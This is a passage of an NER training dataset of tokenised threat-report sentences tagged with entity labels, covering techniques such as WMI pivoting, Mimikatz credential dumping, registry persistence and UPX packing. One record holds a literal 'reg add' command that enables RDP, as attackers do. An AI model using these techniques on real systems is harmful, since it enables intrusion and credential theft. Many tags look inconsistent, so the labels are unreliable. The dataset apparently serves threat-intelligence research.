"I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "systeminfo" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "systeminfo" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "WMI", - "was", - "used", - "to", - "pivot", - "to", - "a", - "domain", - "controller", - "on", - "the", - "network." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actor", - "leveraged", - "Impacket’s", - "wmiexec.py", - "to", - "execute", - "commands", - "with", - "a", - "semi-interactive", - "shell" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "interacts", - "with", - "remote", - "endpoints", - "via", - "WMI" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "a", - "number", - "of", - "WMI", - "requests", - "via", - "DCERPC", - "from", - "one", - "endpoint", - "to", - "a", - "target", - "endpoint", - "based", - "on", - "the", - "ports." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "‘Powershell.exe’", - "process", - "initiated", - "the", - "WMI", - "requests." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "of", - "the", - "observed", - "commands", - "invoked", - "via", - "WMI", - "was", - "‘firefox.exe’." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "commands", - "executed", - "included", - "directory", - "traversal," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Tool", - "Used", - "to", - "Steal", - "Sensitive", - "Information" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "proxying", - "the", - "traffic" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "initiating", - "a", - "proxied" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Several", - "HTTP", - "Post", - "events", - "were", - "observed", - "to", - "the", - "identified", - "domains" - ], - "ner_tags": [ - "O", - "B-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "stream", - "containing", - "the", - "content" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "POST", - "event", - "included", - "a", - "MIME", - "part", - "indicating", - "file", - "upload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "file", - "that", - "was", - "uploaded", - "775E.bin", - "was", - "deleted", - "by", - "the", - "injected", - "‘Explorer.exe’", - "process", - "from", - "the", - "target", - "endpoint" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "was", - "able", - "to", - "RDP", - "to", - "a", - "backup", - "server", - "using", - "the", - "admin", - "credentials", - "they", - "acquired." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "script", - "called", - "a", - "combination", - "of", - "QueueUserAPC,", - "GetCurrentThreadId,", - "OpenThread,", - "and", - "VirtualAlloc", - "to", - "perform", - "process", - "injection", - "of", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "shellcode", - "stored", - "in", - "Base64." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "mounted", - "file", - "contains", - "a", - "hidden", - "folder" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "200+MB", - "padded", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "padding", - "the", - "contents", - "with", - "benign", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "included", - "a", - "standalone", - "file", - "padded", - "with", - "over", - "200MB", - "of", - "blank", - "spaces,", - "likely", - "to", - "impede", - "analysis", - "of", - "the", - "decompressed", - "ISO", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "a", - "CMD", - "file" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "The", - "CMD", - "file", - "contains", - "commands" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "use", - "certutil", - "(renamed", - "here", - "as", - "slaughterhouse.exe)", - "to", - "decode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decoded", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "thus", - "requires", - "two", - "rounds", - "of", - "decoding", - "using", - "certutil." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "chaining", - "together", - "a", - "series", - "of", - "scripts", - "to", - "decode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "victim", - "double", - "clicks", - "the", - "ISO", - "to", - "mount", - "it" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Victims", - "can", - "be", - "lured", - "into", - "clicking", - "executable", - "content", - "including", - "binaries,", - "scripts", - "or", - "shortcut", - "files", - "masquerading", - "as", - "benign", - "filetypes", - "such", - "as", - "PDFs", - "or", - "folders." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DLL", - "is", - "then", - "executed", - "using", - "rundll32" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "and", - "injects", - "Qakbot", - "into", - "wermgr.exe." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "This", - "file", - "is", - "base64", - "twice," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "or", - "unpack", - "the", - "final", - "payload" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "modifies", - "registry", - "keys", - "to", - "maintain", - "persistence," - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Modifies", - "the", - "Windows", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "modifies", - "the", - "Windows", - "Registry", - "to", - "allow", - "remote", - "desktop", - "connections" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "establishes", - "persistence", - "through", - "the", - "creation", - "of", - "two", - "keys", - "in", - "CurrentVersion\\Run." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Creates", - "registry", - "key", - "for", - "persistence", - "only" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Creates", - "two", - "registry", - "keys", - "for", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Keys", - "found", - "in", - "CurrentVersion\\Run", - "contain", - "references", - "to", - "programs", - "that", - "will", - "execute", - "when", - "a", - "user", - "logs", - "in." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "operators", - "install", - "and", - "execute", - "remote", - "access", - "tools", - "such", - "as", - "Splashtop", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "remote", - "monitoring", - "and", - "management", - "(RMM)", - "software" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "operators", - "use", - "Splashtop", - "to", - "transfer", - "malicious", - "tools", - "from", - "computer", - "to", - "computer", - "in", - "the", - "victim’s", - "environment." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "copies", - "other", - "malicious", - "batch", - "and", - "EXE", - "files", - "from", - "a", - "compromised", - "internal", - "Server", - "Message", - "Block", - "(SMB)", - "server", - "to", - "the", - "newly", - "created", - "temp", - "folder" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "operators", - "utilize", - "RDP", - "to", - "move", - "laterally", - "in", - "the", - "victim’s", - "environment." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Modifies", - "the", - "Windows", - "registry", - "to", - "allow", - "remote", - "desktop", - "connections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "operators", - "open", - "up", - "an", - "Remote", - "Desktop", - "Protocol", - "(RDP)", - "port" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "operators", - "use", - "Mimikatz", - "to", - "dump", - "passwords." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "operators", - "use", - "Mimikatz", - "to", - "dump", - "passwords", - "from", - "LSASS." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz,", - "which", - "is", - "a", - "tool", - "used", - "for", - "extracting", - "sensitive", - "information", - "such", - "as", - "passwords", - "and", - "authentication", - "credentials", - "from", - "a", - "Windows", - "operating", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "being", - "leveraged", - "maliciously", - "by", - "threat", - "actors", - "in", - "the", - "following", - "ways:", - "Credential", - "Loading", - "Mimikatz", - "loads", - "credentials", - "from", - "various", - "sources", - "such", - "as", - "Windows", - "memory,", - "Local", - "Security", - "Authority", - "Subsystem", - "Service", - "(LSASS)", - "process" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "allows", - "the", - "user", - "to", - "manipulate", - "the", - "dumped", - "credentials," - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "a", - "small,", - "UPX-packed", - "password", - "protected", - "binary" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "version", - "of", - "Mimikatz", - "has", - "been", - "compressed", - "using", - "UPX" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "While", - "UPX", - "is", - "often", - "legitimately", - "used", - "to", - "reduce", - "file", - "size,", - "we", - "have", - "observed", - "threat", - "actors", - "utilizing", - "UPX", - "and", - "other", - "packing", - "programs", - "to", - "evade", - "static", - "detection", - "of", - "the", - "underlying", - "payload." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "operators", - "use", - "UPX", - "to", - "pack", - "DC2.exe", - "and", - "DC4.exe", - "to", - "avoid", - "static", - "signature", - "detection." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "batch", - "file", - "makes", - "the", - "following", - "changes", - "to", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "an", - "embedded", - "batch", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "a", - "batch", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "a", - "batch", - "script", - "that", - "creates", - "a", - "new", - "user" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "batch", - "script", - "that," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "batch", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disables", - "the", - "User", - "Account", - "Control", - "(UAC)" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attempting", - "to", - "use", - "sc", - "stop", - "and", - "taskkill", - "to", - "stop", - "over", - "100", - "services", - "related", - "to", - "various", - "areas", - "ranging", - "from", - "remote", - "desktop", - "tools", - "to", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "The", - "HTML", - "code", - "in", - "this", - "file", - "contains", - "embedded", - "JavaScript", - "functionality," - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "cleanup", - "script", - "used", - "to", - "remove", - "evidence", - "of", - "the", - "attack", - "on", - "a", - "system" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cleanup", - "scripts", - "from", - "other", - "threat", - "actors", - "are", - "usually", - "smaller", - "and", - "more", - "specific", - "to", - "the", - "tools", - "used", - "by", - "that", - "actor." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "adds", - "an", - "additional", - "layer", - "of", - "obfuscation", - "to", - "the", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "password-protected", - "executables", - "to", - "obfuscate", - "malware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "operators", - "used", - "Splashtop", - "–", - "a", - "remote", - "access", - "and", - "management", - "(RMM)", - "tool", - "–", - "to", - "transfer", - "the", - "following", - "malware", - "into", - "the", - "target’s", - "environment." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "operators", - "use", - "Splashtop", - "to", - "move", - "laterally", - "and", - "transfer", - "malware", - "between", - "compromised", - "hosts", - "in", - "the", - "victim’s", - "environment." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Purp", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "utilize", - "Splashtop", - "to", - "transfer", - "netscan.exe,", - "netscan.lic,", - "netscan.xml,", - "newuser.bat,", - "start.bat", - "and", - "turnoff.bat." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "operators", - "delete", - "files", - "such", - "as", - "mim.exe,", - "mim32.exe,", - "zam.exe", - "and", - "zam.bat", - "to", - "cover", - "their", - "tracks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hid", - "the", - "installer", - "for", - "Advanced", - "Port", - "Scanner", - "within", - "Inno", - "Setup", - "installer", - "to", - "evade", - "static", - "signature", - "detection." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "employing", - "a", - "combination", - "of", - "outdated", - "Microsoft", - "Office", - "document", - "vulnerabilities" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "I-Exp" - ] - }, - { - "tokens": [ - "exploit", - "vulnerabilities", - "in", - "Microsoft", - "Word’s", - "Equation", - "Editor" - ], - "ner_tags": [ - "I-Exp", - "I-Exp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "leverages", - "a", - "specific", - "set", - "of", - "vulnerabilities,", - "including", - "CVE-2018-0802,", - "CVE-2018-0798,", - "and", - "CVE-2017-11882,", - "within", - "the", - "Equation", - "Editor", - "of", - "Microsoft", - "Office" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "employs", - "a", - "forged", - "document", - "linked", - "to", - "G7", - "to", - "target", - "various", - "governments", - "within", - "the", - "G20", - "forum." - ], - "ner_tags": [ - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "spam", - "email", - "comprising", - "an", - "attached", - "MS", - "Office", - "document" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "employ", - "the", - "remote", - "template", - "injection", - "method", - "to", - "retrieve", - "the", - "next", - "stage", - "of", - "the", - "malware", - "from", - "the", - "TA’s", - "Command-and-Control", - "(C&C)", - "server." - ], - "ner_tags": [ - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "of", - "a", - "new", - "payload", - "from", - "the", - "attacker’s", - "remote", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "a", - "backdoor", - "module." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "and", - "executes", - "a", - "malicious", - "backdoor" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enables", - "the", - "TAs", - "to", - "create", - "customized", - "documents", - "containing", - "embedded", - "objects", - "that", - "exploit", - "vulnerabilities", - "in", - "Microsoft", - "Word’s", - "Equation", - "Editor" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "drops", - "an", - "embedded", - "payload,", - "which", - "is", - "a", - "DLL", - "file" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "includes", - "both", - "an", - "encrypted", - "payload", - "and", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypts", - "the", - "collected", - "information", - "using", - "RC4", - "encryption", - "with", - "the", - "key", - "“xkYgv127”", - "and", - "encodes", - "it", - "using", - "base64." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "proceeds", - "to", - "decrypt" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scheduled", - "task", - "entry," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "the", - "export", - "function", - "“StartA”", - "from", - "the", - "DLL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "utilizing", - "the", - "“rundll32.exe”", - "command" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "loader", - "is", - "executed", - "through", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "hostname,", - "operating", - "system", - "name,", - "OS", - "version,", - "username," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Gather", - "computer-specific", - "information", - "such", - "as", - "computer", - "name,", - "username,", - "gateway", - "address,", - "network", - "adapter", - "details,", - "Windows", - "version,", - "and", - "user", - "type" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Internet", - "information," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Retrieve", - "TCP/UDP", - "tables" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "presence", - "of", - "any", - "installed", - "anti-virus", - "software", - "on", - "the", - "machine." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "data", - "is", - "then", - "exfiltrated", - "using", - "the", - "below", - "C&C", - "URL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "data", - "is", - "then", - "exfiltrated", - "using", - "the", - "below", - "C&C", - "URL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C&C", - "server", - "responds", - "with", - "the", - "next", - "stage", - "executable" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "loader", - "establishes", - "a", - "connection", - "with", - "a", - "C&C", - "server", - "in", - "the", - "final", - "stage", - "of", - "the", - "attack." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Capture", - "screenshots", - "of", - "victims’", - "system" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Obtain", - "information", - "about", - "processes", - "and", - "services", - "running", - "on", - "the", - "machine" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Retrieve", - "information", - "about", - "registry", - "keys" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "remote", - "process", - "execution", - "tool", - "PSExec", - "to", - "execute", - "batch", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Copy", - "down", - "batch", - "scriptsExecute", - "batch", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "defaultChanges", - "the", - "Windows", - "Shell", - "from", - "Explorer", - "to", - "their", - "malicious", - "script" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exe└──cmd.exe:", - "C:\\Windows\\system32\\cmd.exe", - "/c", - "\"\"rdp.bat\"" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "executes", - "the", - "shell", - "(file2.bat)," - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "tries", - "to", - "start", - "its", - "defined", - "shell", - "which", - "has", - "been", - "swapped", - "to", - "a", - "batch", - "script", - "(file2.bat)", - "by", - "the", - "malicious", - "actor." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Command", - "line", - "flags", - "may", - "be", - "used", - "to", - "change", - "this", - "behavior", - "and", - "invoke", - "one", - "or", - "more", - "of", - "the", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "that", - "would", - "cause", - "registry", - "changes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reg.exe:", - "reg", - "add", - "\"HKLM\\System\\CurrentControlSet\\Control\\Terminal", - "Server\"", - "/v", - "\"fDenyTSConnections\"", - "/t", - "REG_DWORD", - "/d", - "0", - "/" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Sets", - "various", - "registry", - "values" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "to", - "enable", - "Remote", - "Desktop", - "sessions", - "(RDP)", - "using", - "reg.exe." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "malicious", - "actor", - "retrieved", - "system", - "administration", - "tools", - "and", - "malicious", - "payloads", - "by", - "using", - "the", - "Background", - "Intelligent", - "Transfer", - "Service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Storing", - "the", - "ransomware", - "within", - "a", - "7zip", - "encrypted", - "archive" - ], - "ner_tags": [ - "O", - "O", - "O", - 